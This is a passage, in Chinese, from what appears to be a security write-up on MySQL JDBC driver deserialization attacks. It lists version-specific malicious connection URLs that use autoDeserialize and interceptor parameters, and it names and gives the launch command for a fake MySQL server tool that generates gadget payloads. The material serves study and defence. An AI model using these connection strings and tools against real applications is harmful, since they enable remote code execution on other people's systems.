"&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
|
6.x
属性名有所不同,queryInterceptors 换为 statementInterceptors
1
| jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
|
>=5.1.11
包名中没有cj
1
| jdbc:mysql://xxx.xxx.xxx.xxx:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor
|
5.x <= 5.1.10
同>=5.1.11版本,但需要连接后执行查询操作。
5.1.29 - 5.1.40
1
| jdbc:mysql://x.x.x.x:3306/test?detectCustomCollations=true&autoDeserialize=true
|
5.1.28 - 5.1.19
1
| jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true
|
工具
MySQL-fake-server,纯 Java 实现的 MySQL Fake Server | 支持 GUI 版和命令行版 | 支持反序列化和文件读取的利用方式 | 支持常见的 GADGET 和自定义 GADGET 数据 | 根据目标环境自动生成匹配的 PAYLOAD | 支持 PGSQL 和 DERBY 的利用,项目地址如下
1
| https://github.com/4ra1n/mysql-fake-server
|
启动命令如下,这里使用gui版fake-mysql,启动后可以根据自己的环境输入参数,生成payload
1
| java -jar fake-mysql-gui.jar
|
参考链接
参考文章如下,感谢大佬们的帮助
https://drun1baby.top/2023/01/13/MySQL-jdbc-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90/#0x03-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90
https://xz.aliyun.com/news/7754
